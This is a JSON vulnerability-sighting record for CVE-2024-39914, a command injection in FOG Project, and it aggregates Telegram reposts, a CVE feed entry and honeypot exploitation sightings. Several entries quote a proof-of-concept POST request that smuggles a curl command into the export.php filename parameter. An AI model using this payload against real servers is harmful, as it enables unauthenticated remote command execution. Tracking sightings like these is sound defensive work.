{"vulnerability": "CVE-2024-39914", "sightings": [{"uuid": "1fc89e77-601a-461b-91b3-42e12526f0cc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-39914", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/9542", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aFOG Project CVE-2024-39914 \u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\nURL\uff1ahttps://github.com/9874621368/FOG-Project\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-12-21T08:31:52.000000Z"}, {"uuid": "911717d7-6e1a-4fcd-b122-fc600591fffd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-39914", "type": "published-proof-of-concept", "source": "https://t.me/information_security_channel/53766", "content": "CVE-2024-39914 \u2013 Unauthenticated Command Injection in FOG Project\u2019s export.php\nhttps://www.offsec.com/blog/cve-2024-39914/\n\nDiscover details about CVE-2024-39914, a critical unauthenticated command injection vulnerability in FOG Project \u2264 1.5.10.34. Learn how attackers can exploit export.php to execute system commands or deploy persistent webshells.\nThe post CVE-2024-39914 \u2013 Unauthenticated Command Injection in FOG Project\u2019s export.php (https://www.offsec.com/blog/cve-2024-39914/) appeared first on OffSec (https://www.offsec.com/).", "creation_timestamp": "2025-06-26T17:12:35.000000Z"}, {"uuid": "edcda892-5d71-461e-8bf2-f1a26a57c476", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-39914", "type": "published-proof-of-concept", "source": "Telegram/h1_LAWym1OOJC74U1dEhhZt9xiPrPSKNY3U7mPMWdbLETg", "content": "", "creation_timestamp": "2024-09-21T16:07:02.000000Z"}, {"uuid": "3f26358b-e1e3-457c-8d35-ceb218c95081", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-39914", "type": "published-proof-of-concept", "source": "https://t.me/HackerArsenal/413", "content": "", "creation_timestamp": "2024-09-21T20:25:51.000000Z"}, {"uuid": "5eab17b7-5e0d-464f-95f8-19df28b594ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-39914", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/18821", "content": "", "creation_timestamp": "2024-09-21T16:06:46.000000Z"}, {"uuid": "6e3a3e18-89a1-4d1b-bb6a-2c51060ab9f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-39914", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-02-14)", "content": "", "creation_timestamp": "2026-02-14T00:00:00.000000Z"}, {"uuid": "c2d889fb-1f3c-477b-86e7-faf451032651", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-39914", "type": "published-proof-of-concept", "source": "Telegram/bnboRDeRN7IU096wLrYLWa4VlIpVRHhLuXL8TpL8JVJFXQ", "content": "", "creation_timestamp": "2024-07-24T07:42:04.000000Z"}, {"uuid": "e161fe56-6ccf-4290-87cf-02a75a4bb0a2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-39914", "type": "seen", "source": "https://t.me/cvedetector/760", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-39914 - FOG is a cloning/imaging/rescue suite/inventory ma\", \n  \"Content\": \"CVE ID : CVE-2024-39914 \nPublished : July 12, 2024, 3:15 p.m. | 20\u00a0minutes ago \nDescription : FOG is a cloning/imaging/rescue suite/inventory management system. Prior to 1.5.10.34, packages/web/lib/fog/reportmaker.class.php in FOG was affected by a command injection via the filename parameter to /fog/management/export.php. This vulnerability is fixed in 1.5.10.34. \nSeverity: 9.8 | CRITICAL \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"12 Jul 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-07-12T17:46:33.000000Z"}, {"uuid": "ccb6ef5b-735a-4d6f-b8f1-f7f82d39a43b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-39914", "type": "published-proof-of-concept", "source": "https://t.me/Kelvinseccommunity/565", "content": "FOG Project CVE-2024-39914\n\nPOST /fog/management/export.php?filename=$(curl+http://url)&type=pdf HTTP/1.1\nHost: 127.0.0.1\n\nfogguiuser=fog&nojson=2\n\n\n\uff08curl+http://url\uff09\n\n#exploit #poc", "creation_timestamp": "2024-07-23T18:38:23.000000Z"}, {"uuid": "5973d82e-d7eb-4e96-9588-1bb88695d83c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-39914", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/14716", "content": "FOG Project CVE-2024-39914\n\nPOST /fog/management/export.php?filename=$(curl+http://url)&type=pdf HTTP/1.1\nHost: 127.0.0.1\n\nfogguiuser=fog&nojson=2\n\n\n\uff08curl+http://url\uff09\n\n#exploit #poc", "creation_timestamp": "2024-07-24T05:57:11.000000Z"}, {"uuid": "de9f8a70-6604-43c4-b8b7-0e7e66bbd746", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-39914", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/2038", "content": "", "creation_timestamp": "2024-09-21T16:06:46.000000Z"}, {"uuid": "5fe17a9b-6b63-4b57-864a-5dfd2f16aed9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-39914", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/1419", "content": "FOG Project CVE-2024-39914\n\nPOST /fog/management/export.php?filename=$(curl+http://url)&type=pdf HTTP/1.1\nHost: 127.0.0.1\n\nfogguiuser=fog&nojson=2\n\n\n\uff08curl+http://url\uff09\n\n#exploit #poc", "creation_timestamp": "2024-07-24T05:57:11.000000Z"}, {"uuid": "400968d3-b97e-4cbf-b35a-c6e023276a9f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-39914", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/2832", "content": "FOG Project CVE-2024-39914\n\nPOST /fog/management/export.php?filename=$(curl+http://url)&type=pdf HTTP/1.1\nHost: 127.0.0.1\n\nfogguiuser=fog&nojson=2\n\n\n\uff08curl+http://url\uff09\n\n#exploit #poc", "creation_timestamp": "2024-07-23T17:04:26.000000Z"}, {"uuid": "11a1f9f5-0c1e-4d02-bdb0-945912fdb2e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-39914", "type": "published-proof-of-concept", "source": "https://t.me/BackupLulz/243", "content": "", "creation_timestamp": "2024-11-03T04:41:27.000000Z"}, {"uuid": "237c525e-c707-40e4-8b18-d908e7808119", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-39914", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-01)", "content": "", "creation_timestamp": "2025-02-01T00:00:00.000000Z"}, {"uuid": "11a32279-d677-47ef-9a58-8ea5c4565b15", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-39914", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-05)", "content": "", "creation_timestamp": "2025-10-05T00:00:00.000000Z"}, {"uuid": "dd5e940c-4273-469b-b6de-af921f1aad09", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-39914", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-10)", "content": "", "creation_timestamp": "2025-11-10T00:00:00.000000Z"}, {"uuid": "1b5aad7e-00b7-41dc-bc32-8d6e08350faf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-39914", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-26)", "content": "", "creation_timestamp": "2025-06-26T00:00:00.000000Z"}]}